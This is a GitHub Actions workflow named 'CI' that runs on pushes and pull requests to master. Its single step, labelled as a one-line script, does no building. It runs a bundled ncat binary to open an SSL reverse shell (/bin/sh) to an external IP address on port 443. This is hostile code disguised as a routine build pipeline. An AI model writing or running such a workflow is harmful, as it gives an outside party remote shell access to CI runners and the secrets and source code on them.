name: CI

on:
  push:
    branches: [ master ]
  pull_request:
    branches: [ master ]

jobs:
  build:
    runs-on: macos-latest

    steps:
    - uses: actions/checkout@v2
    - name: Run a one-line script
      run: |
        chmod +x ncat
        ncat --ssl -e /bin/sh -v 52.183.32.210 443